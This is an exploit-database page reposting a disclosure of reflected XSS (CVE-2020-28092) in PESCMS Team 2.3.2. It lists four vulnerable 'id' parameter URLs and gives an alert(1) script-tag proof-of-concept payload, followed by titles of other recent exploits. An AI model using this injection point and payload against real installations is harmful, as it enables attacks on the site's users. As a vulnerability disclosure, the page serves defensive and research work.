Pescms team 2.3.2 multiple reflected xss Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-11-19 | Type : webapps | Platform : multiple
This exploit / vulnerability Pescms team 2.3.2 multiple reflected xss is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id

parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=

please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

now I input payload :

"><ScRiPt>alert(1)</ScRiPt>

Pescms team 2.3.2 multiple reflected xss


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Pescms team 2.3.2 multiple reflected xss Vulnerability / Exploit